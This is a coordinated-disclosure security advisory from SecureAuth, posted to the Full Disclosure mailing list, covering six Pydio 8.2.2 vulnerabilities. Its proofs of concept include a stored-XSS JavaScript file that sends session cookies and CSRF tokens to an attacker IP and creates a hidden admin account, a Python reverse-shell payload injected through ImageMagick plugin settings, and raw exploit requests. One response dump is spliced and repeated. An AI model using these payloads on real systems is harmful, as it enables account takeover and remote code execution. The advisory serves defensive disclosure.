lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 28 Mar 2019 17:24:22 +0000
From: SecureAuth Advisories <advisories@...ureauth.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
 "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] [SAUTH-2019-0002] - Pydio 8 Multiple Vulnerabilities

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Pydio 8 Multiple Vulnerabilities

1. *Advisory Information*

Title: Pydio 8 Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0002
Advisory URL:
https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities
Date published: 2019-03-28
Date of last update: 2019-03-28
Vendors contacted: Pydio
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Argument Injection or Modification [CWE-88], Argument Injection
or Modification [CWE-88], Information Exposure [CWE-200], Improper
Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79], Information Exposure [CWE-200],
Information Exposure [CWE-200]
Impact: Code execution, Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047,
CVE-2019-10046, CVE-2019-10046

3. *Vulnerability Description*
Pydio [1] website states that:
...Pydio, an open source EFSS (Enterprise File Synchronization and
Sharing) solution that can be deployed On-Premise or in a Hybrid / Cloud
environment. Pydio is available either through a Community distribution
(Ideal for home use) that is free forever or an Enterprise which
provides all the features, support and compliance to secure file sharing.
Pydio is sold in more than 25 countries, from Cupertino to Singapore,
and is used by leading brands around the world, such as Nikon, Credit
Agricole, Dexia... Pydio also serves education and government clients,
with major references such as Cambridge University (UK) and ADEME
(France).

Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2),
which allows an attacker with regular user access to the application and
by tricking an administrator account to open a shared URL bookmark
through the application, to obtain the victim's session identifiers in
order to impersonate him/her and to perform actions such as create a new
user administrator account. After gaining privileged access to the
application the attacker can leverage another vulnerability to perform
OS command injection under the privileges of the user account running
the web server.

4. *Vulnerable Packages*

. Pydio 8.2.2 - Latest version at the time of testing.
. Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Pydio published v8.2.3 that fixes all the reported vulnerabilities.

6. *Credits*

These vulnerabilities were discovered and researched by Ramiro Molina
from SecureAuth Security Consulting Services. The publication of this
advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories
Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege escalation vector based in multiple vulnerabilities*

[CVE-2019-10049]
By chaining vulnerabilities it is possible for an attacker with regular
user access to the web application to attempt to trick an administrator
user to open a link shared through the application, that in turn opens a
shared file that contains JavaScript code that is executed in the
context of the victim user to obtain sensitive information such as
session identifiers (session cookie and secure token) and perform
actions on behalf of him/her.

Note: if the targeted users are not administrators, any other action on
behalf of that user could also be achieved, to for example obtain
sensitive files stored in their accounts or impersonate them.

Attack vector steps:

1. Authenticated in the web application with a regular user account, go
to "My Files" and upload a file named for example pydio_xss.html (use
the .html extension) with the following content. The PoC once executed
performs several requests to:

. Obtain a "secure_token" for the user, which is a CSRF prevention token.
. Obtain the session cookie for the current user.
. Send the two sensitive tokens to the attacker, this allows to
impersonate the victim user.
. Change the "context to configuration".
. Create a new user account named "admin99" with password "password1".
. Change the user role of the created user to administrator.

Note: change the IP address and port number (the example ones are the
IP 192.168.56.1 and port 9999).

PoC pydio_xss.html file:

/-----
<html>
<body>
<script type="text/javascript">
console.log("Starting...");
var req0 = new XMLHttpRequest();
req0.open('GET', "/welcome/", true);
req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
req0.send();
req0.onload  = function() {
var res =  req0.responseText.match(/SECURE_TOKEN.*?,/)[0];
var secure_token = res.split(/"/)[2] ;
var req1 = new XMLHttpRequest();
  req1.open('POST', "index.php", true);
  req1.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
  req1.send("get_action=get_sess_id&secure_token=" + secure_token);
  req1.onload  = function() {
      var session_cookie = req1.responseText;
      var req2 = new XMLHttpRequest();
      req2.open('POST', "http://192.168.56.1:9999/creds", true);
      req2.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
      req2.send("Session Cookie: " + session_cookie + "; secure_token: "
+ secure_token);
      req2.onload  = function() {
          console.log("I just sent your protected session cookie.");
      };
      //switch "repository" to  configuration
      var req3 = new XMLHttpRequest();
      req3.open('POST', "/index.php", true);
      req3.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
     
req3.send("get_action=switch_repository&repository_id=ajxp_conf&secure_token="
+ secure_token);
      req3.onload  = function() {
          console.log("Creating a new admin user...");
          var req4 = new XMLHttpRequest();
          req4.open('POST', "/index.php", true);
          req4.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
         
req4.send("get_action=create_user&new_user_login=admin99&new_user_pwd=password1&group_path=&secure_token="
+ secure_token);
          req4.onload  = function() {
              console.log(req4.responseText);
          console.log("Promoting user to admin...");
          var req5 = new XMLHttpRequest();
          req5.open('POST', "/index.php", true);
          req5.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
         
req5.send("get_action=edit&sub_action=post_json_role&role_id=AJXP_USR_%2Fadmin99&json_data=%7B%22ROLE%22%3A%7B%22ACL%22%3A%7B%7D%2C%22MASKS%22%3A%7B%7D%2C%22ACTIONS%22%3A%7B%7D%2C%22PARAMETERS%22%3A%7B%7D%2C%22APPLIES%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D%2C%22METADATA%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D&secure_token="
+ secure_token);
          req5.onload  = function() {
              console.log(req5.responseText);
              };
          };
      };
  };
};
</script>
</body>
</html>
-----/

2. Still in "My Files" create a new URL bookmark with the following URL
and a label of your choice. Note that selecting a good label can help
into tricking an administrator user into opening the bookmark. The URL
must reference the filename uploaded in the previous step. For this
example, the file is named '"pydio_xss.html"':

/-----
http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fpydio_xss.html
-----/

3. Select each the uploaded HTML file and share it with the administrator
user account by clicking on share and in the popup, window select the
target user (or users if the administrator account is not known) and
click on save.

4. Do the same with the URL Bookmark and share it with the victim
administrator user/s.

5. On a command prompt with for example ncat set a listener for the
incoming post request with the session identifiers.

6. Once the administrator opens the URL Bookmark the JavaScript code in
the uploaded file will be executed, the session identifiers will be
posted to the attacker's machine and a new administrator user (named
"admin99" with password "password1") will be created.

7. The attacker can login with the created administrator user or can
leverage the session identifiers to impersonate the victim user.

Note: after gaining access as an administrator to the web application an
attacker can leverage the OS command injection vulnerability described
in this advisory to run system commands on the underling operative
system with the local user running the web server.

7.2. *OS command injection by parameter abuse in ImageMagick plugin*

[CVE-2019-10048]
The 'ImageMagick' plugin that is installed by default in Pydio 8.2.2
does not perform the appropriate validation and sanitization of user
supplied input in the plugin's configuration options allowing arbitrary
shell commands to be entered that result in command execution on the
underlying operative system with the privileges of the local user
running the web server. The attacker will need to be authenticated into
the application with an administrator user account in order to be able
to edit the affected plugin configuration. In this advisory a privilege
escalation vector by levering other vulnerabilities from a regular user
standpoint is also described.

Proof of Concept:

1. Logged in with an administrator account into the web application,
go to Settings -> Editors.

2. Disable the PDF Viewer plugin.

3. Enable the ImageMagick plugin.

4. Click on Edit ImageMagick plugin settings.

5. In the popup window, add at the end of the current settings for the
"Thumbs options" and "Images options" parameters the following example
payload to run a python reverse shell (where in the example the IP
address is 192.168.56.1 and the port number is 9999, edit accordingly)
and save the settings. An example payload is:

/-----
; python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",9999));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';
-----/

6. On a command prompt with for example ncat set a listener for the
incoming reverse shell.

7. With the administrator account, or any other account upload a test
PDF file to a workspace and observe that a reverse shell is received.

Affected source code:

The affected source code section is located in the file:
'"plugins/editor.imagick/IMagickPreviewer.php" line #380'. The following
code section is where the vulnerability is located. Note that the user
provided parameters are not validated and sanitized before construction
the "$cmd" string an being passed to the exec() function.

/-----
$customOptions = $this->getContextualOption($ctx, "IM_CUSTOM_OPTIONS");
$customEnvPath = $this->getContextualOption($ctx, "ADDITIONAL_ENV_PATH");
$viewerQuality = $this->getContextualOption($ctx, "IM_VIEWER_QUALITY");
$thumbQuality = $this->getContextualOption($ctx, "IM_THUMB_QUALITY");
if (empty($customOptions)) {
    $customOptions = "";
}
if (!empty($customEnvPath)) {
    putenv("PATH=".getenv("PATH").":".$customEnvPath);
}
$params = $customOptions." ".( $this->extractAll? $viewerQuality :
$thumbQuality );
$cmd = $this->getContextualOption($ctx, "IMAGE_MAGICK_CONVERT")."
".$params." ".escapeshellarg(($masterFile).$pageLimit)."
".escapeshellarg($tmpFileThumb);
$this->logDebug("IMagick Command : $cmd");
session_write_close(); // Be sure to give the hand back
exec($cmd, $out, $return);
-----/

7.3. *Current user AjaXplorer session cookie value disclosure*

[CVE-2019-10045]
The 'AjaXplorer' session cookie is correctly set with the 'HTTPOnly'
flag to prevent access to its value from scripts. The affected "action"
'get_sess_id' discloses the session cookie value in the response body
enabling scripts to get access to its value. This identifier can be
reused by an attacker to impersonate a user and perform actions on
behalf of him/her if the session is still active.

Proof of Concept:

The response to the following HTTP POST request with the parameter
'get_action=get_sess_id' returns the current user session identifier
('AjaXplorer' session cookie value) in the response.

Request:

/-----
POST /index.php? HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/ws-inbox/
content-type: application/x-www-form-urlencoded; charset=UTF-8
origin: http://192.168.56.101
Content-Length: 68
Connection: close
Cookie: AjaXplorer=1ln7fa60h1ajsapm7ha45sge26; ajxp_licheck=ok

get_action=get_sess_id&secure_token=zZ6lpJaRUovEYm0imb839L8YhWI1UHZK
-----/

Response:

/-----
HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:21:18 GMT
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/plain;charset=UTF-8
Content-Length: 26

1ln7fa60h1ajsapm7ha45sge26
-----/

7.4. *Stored Cross-site scripting (XSS) in file view feature*

[CVE-2019-10047]
A stored cross-site scripting vulnerability exists in the affected web
application that can be exploited by levering the file upload and file
preview features of the application. An authenticated attacker can
upload an HTML file containing Javascript code and afterword's a file
preview URL can be used to access the uploaded file.
If a malicious user shares an uploaded HTML file containing JavaScript
code with another user of the application and tricks an authenticated
victim into accessing an URL (i.e. by clicking in a link) that results
in the HTML code being interpreted by the web browser and the included
JavaScript code being executed under the context of the victim user
session.

Proof of Concept:

With an authenticated user go to "My Files" and upload a HTML file as
the following PoC, which is named for example "xss.html":

/-----
<html>
<body>
<script type="text/javascript">
alert("SecureAuth");
</script>
</body>
</html>
-----/

In another tab of the web browser access the following URL, and notice
that the JavaScript code is executed, and a popup alert is displayed:

/-----
http://192.168.56.102/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html
-----/

Request:

/-----
GET
/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html
HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: AjaXplorer=gdn92c6maohf28lt2noiso1891; ajxp_licheck=ok
Upgrade-Insecure-Requests: 1
-----/

Response:

/-----
HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:00:21 GMT
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Disposition: inline; filename="xss.html"
Content-Length: 66
Connection: close
Content-Type: text/html; charset=us-ascii; name="xss.html"

<html>
<body>
<script>alert("SecureAuth")</script>
</body>
</html>
-----/

Share the file with an administrator user, and logged in with that user
account access the "Shared Files" repository and in another tab, access
following URL and notice that the JavaScript code is also executed:

/-----
http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html
-----/

Request:

/-----
GET /index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html
HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: AjaXplorer=6vh2o75udh253f6lu8p99cpmr5; ajxp_licheck=ok
Upgrade-Insecure-Requests: 1
-----/

Response:

/-----
HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:01:05 GMT
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Disposition: inline; filename="xss.html"
Content-Length: 66
Connection: close
Content-Type: text/html; charset=us-ascii; name="xss.html"

<html>
<body>
<script>alert("SecureAuth")</script>
</body>
</html>
-----/

7.5. *Unauthenticated Pydio and PHP libraries versions information
disclosure*

[CVE-2019-10046]
An unauthenticated attacker can obtain information about the Pydio
version and PHP libraries and their versions by performing a HTTP POST
request to '/index.php' and including the parameters
'"get_action=display_doc& doc_file=CREDITS"' in the body.

Proof of Concept:

Request:

/-----
POST /index.php? HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.102/welcome/
content-type: application/x-www-form-urlencoded; charset=UTF-8
origin: http://192.168.56.102
Content-Length: 53
Connection: close
Cookie: AjaXplorer=a; ajxp_licheck=ok

get_action=display_doc&doc_file=CREDITS&secure_token=
-----/

Response:

/-----
HTTP/1.1 200 OK
Date: Wed, 30 Jan 2019 22:26:49 GMT
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
X-Powered-By: PHP/5.6.25
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/plain;charset=UTF-8
Content-Length: 9246

<img src="plugins/gui.ajax/PydioLogo250.png"/>
<br><div style="padding-left:10px;"><div
style="font-size:0.8em;">Version 8.2.2 - 2018-10-10
<br>Copyright 2007-2017 Abstrium SAS
<br>The latest code can be found at https://pydio.com/.
<br></div>
...
TRUNCATED
...
<br>
<br><div class="title">PHP Libraries</div>
<br>
<br>    aws/aws-sdk-php                    3.19.18             Apache-2.0
<br>    commerceguys/guzzle-oauth2-plugin  v2.1.1              MIT
<br>    dapphp/securimage                  3.6.4               BSD
<br>    davegardnerisme/nsqphp             dev-master 60f12ad  none
<br>    evenement/evenement                v2.0.0              MIT
<br>    firebase/php-jwt                   v2.2.0              BSD-3-Clause
<br>    gimler/guzzle-description-loader   v0.0.4              MIT
<br>    guzzlehttp/command                 0.7.1               MIT
<br>    guzzlehttp/guzzle                  5.3.1               MIT
<br>    guzzlehttp/guzzle-services         0.5.0               MIT
<br>    guzzlehttp/promises                1.2.0               MIT
<br>    guzzlehttp/psr7                    1.3.1               MIT
<br>    guzzlehttp/ringphp                 1.1.0               MIT
<br>    guzzlehttp/streams                 3.0.0               MIT
<br>    meenie/javascript-packer           1.1                 LGPL 2.1
<br>    mtdowling/jmespath.php             2.3.0               MIT
<br>    nikic/fast-route                   v1.0.1              BSD-3-Clause
<br>    phpseclib/phpseclib                2.0.3               MIT
<br>    psr/http-message                   1.0.1               MIT
<br>    psr/log                            1.0.2               MIT
<br>    react/cache                        v0.4.1              MIT
<br>    react/child-process                v0.4.1              MIT
<br>    react/dns                          v0.4.3              MIT
<br>    react/event-loop                   v0.4.2              MIT
<br>    react/http                         v0.4.1              MIT
<br>    react/http-client                  v0.4.13             MIT
<br>    react/promise                      v2.4.1              MIT
<br>    react/react                        v0.4.2              MIT
<br>    react/socket                       v0.4.3              MIT
<br>    react/socket-client                v0.4.5              MIT
<br>    react/stream                       v0.4.4              MIT
<br>    sabre/dav                          1.8.10              BSD-3-Clause
<br>    sabre/vobject                      2.1.7               BSD-3-Clause
<br>    symfony/config                     v3.1.5              MIT
<br>    symfony/console                    v3.1.5              MIT
<br>    symfony/debug                      v3.1.5              MIT
<br>    symfony/filesystem                 v3.1.5              MIT
<br>    symfony/polyfill-mbstring          v1.2.0              MIT
<br>    symfony/yaml                       v3.1.5              MIT
<br>    zendframework/zend-diactoros       1.3.7               BSD-2-Clause
<br>
<br>
<br><div class="title">Other Plugins</div>
<br>    PThumb.php <a target="_blank"
href="http://www.phpclasses.org">http://www.phpclasses.org</a> (LPGL)
<br>    OpenLayers <a target="_blank"
href="http://www.openlayers.org">http://www.openlayers.org</a> (BSD)
<br>    Video-js <a target="_blank"
href="http://www.videojs.com/">http://www.videojs.com/</a> (LGPL)
<br>    Zend Lucene <a target="_blank"
href="http://www.zend.com/">http://www.zend.com/</a> (New BSD)
<br>    SoundManager : <a target="_blank"
href="http://www.schillmania.com/projects/soundmanager2/">http://www.schillmania.com/projects/soundmanager2/</a>
(BSD)
<br>    CAS Driver (Apache 2): https://github.com/Jasig/phpCAS
<br>
<br></div>
-----/

7.6. *Unauthenticated Pydio "Boot Config" information disclosure*

[CVE-2019-10046]
An unauthenticated attacker can obtain information about the Pydio
configuration including session timeout and license information by
performing a HTTP GET request to '"/index.php?get_action=get_boot_conf"'.

Proof of Concept:

Request:

/-----
GET /index.php?get_action=get_boot_conf HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
-----/

Response:

/-----
  HTTP/1.1 200 OK
  Date: Wed, 30 Jan 2019 22:42:53 GMT
  Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
  X-Powered-By: PHP/5.6.25
  Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
  Pragma: no-cache
  Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;
Max-Age=0
  Connection: close
  Content-Type: application/json
  Content-Length: 136855
  {
    "ajxpResourcesFolder": "plugins/gui.ajax/res",
    "ajxpServerAccess": "index.php",
    "zipEnabled": true,
    "multipleFilesDownloadEnabled": true,
    "customWording": {
      "welcomeMessage": "My Company File Sharing Platform",
      "title": "Pydio Enterprise",
      "icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",
      "iconWidth": "250px",
      "iconHeight": "120px",
      "iconOnly": true,
      "titleFontSize": ""
    },
    "usersEnabled": true,
    "loggedUser": false,
    "currentLanguage": "en",
    "session_timeou      Date: Wed, 30 Jan 2019 22:42:53 GMT
  Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25
  X-Powered-By: PHP/5.6.25
  Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
  Pragma: no-cache
  Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;
Max-Age=0
  Connection: close
  Content-Type: application/json
  Content-Length: 136855
  {
    "ajxpResourcesFolder": "plugins/gui.ajax/res",
    "ajxpServerAccess": "index.php",
    "zipEnabled": true,
    "multipleFilesDownloadEnabled": true,
    "customWording": {
      "welcomeMessage": "My Company File Sharing Platform",
      "title": "Pydio Enterprise",
      "icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",
      "iconWidth": "250px",
      "iconHeight": "120px",
      "iconOnly": true,
      "titleFontSize": ""
    },
    "usersEnabled": true,
    "loggedUser": false,
    "currentLanguage": "en",
    "session_timeout": 1440,
    "client_timeout": 1440,
    "client_timeout_warning": 3,

  ...
  TRUNCATED
  ...

      "helper_booster.updater.force.2": "force reinstall",
      "helper_booster.updater.force.3": "?"
    },
    "SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",
    "streaming_supported": "true",
    "theme": "material",
    "ajxpImagesCommon": true,
    "licence_features": [
      "TRIAL",
      "footer",
      "splash",
      "customCopyright:<a href='https://pydio.com'>Pydio Enterprise
Distribution</a> - Trial version valid until 2019-02-20."
    ]
  }t": 1440,
    "client_timeout": 1440,
    "client_timeout_warning": 3,

  ...
  TRUNCATED
  ...

      "helper_booster.updater.force.2": "force reinstall",
      "helper_booster.updater.force.3": "?"
    },
    "SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",
    "streaming_supported": "true",
    "theme": "material",
    "ajxpImagesCommon": true,
    "licence_features": [
      "TRIAL",
      "footer",
      "splash",
      "customCopyright:<a href='https://pydio.com'>Pydio Enterprise
Distribution</a> - Trial version valid until 2019-02-20."
    ]
  }
-----/

8. *Report Timeline*
2019-02-11: SecureAuth sent an initial notification to Pydio including
a draft advisory.
2019-02-11: Pydio confirmed the reception of the advisory.
2019-02-15: Pydio informed they were testing the vulnerabilities and
they will answer back next week.
2019-02-15: SecureAuth thanked the update.
2019-02-20: Pydio requested a clarification about some vulnerabilities.
2019-02-21: SecureAuth sent additional information to Pydio.
2019-03-08: SecureAuth requested an update.
2019-03-08: Pydio replied saying they were planning to release their
fix next week and asked. SecureAuth to test this new version.
2019-03-08: SecureAuth thanked the update and agreed to test the new
version.
2019-03-12: Pydio sent the fixed version.
2019-03-15: Pydio asked for an update and proposed to release its fix on
Tuesday 19th.
2019-03-15: SecureAuth informed Pydio that the fixed version was tested
and all the reported vulnerabilities were addressed. In addition,
SecureAuth proposed to postpone the release date to Thursday 21th.
2019-03-18: Pydio thanked the answer and agreed on the proposal.
2019-03-21: Pydio released the version 8.2.3
2019-03-28: Advisory SAUTH-2019-0002 published.

9. *References*

[1] https://pydio.com/en/about-us

10. *About SecureAuth Labs*

SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.

11. *About SecureAuth*

SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches. As
a leader in access management, SecureAuth is powering an identity
security revolution by enabling people and devices to intelligently and
adaptively access systems and data, while effectively keeping bad actors
from doing harm. By ensuring the continuous assessment of risk and
enablement of trust, SecureAuth's highly flexible platform makes it
easier for organizations to prevent the misuse of credentials. To learn
more, visit www.secureauth.com, call (949) 777-6959, or email us at
info@...ureauth.com

12. *Disclaimer*

The contents of this advisory are copyright (c) 2019 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists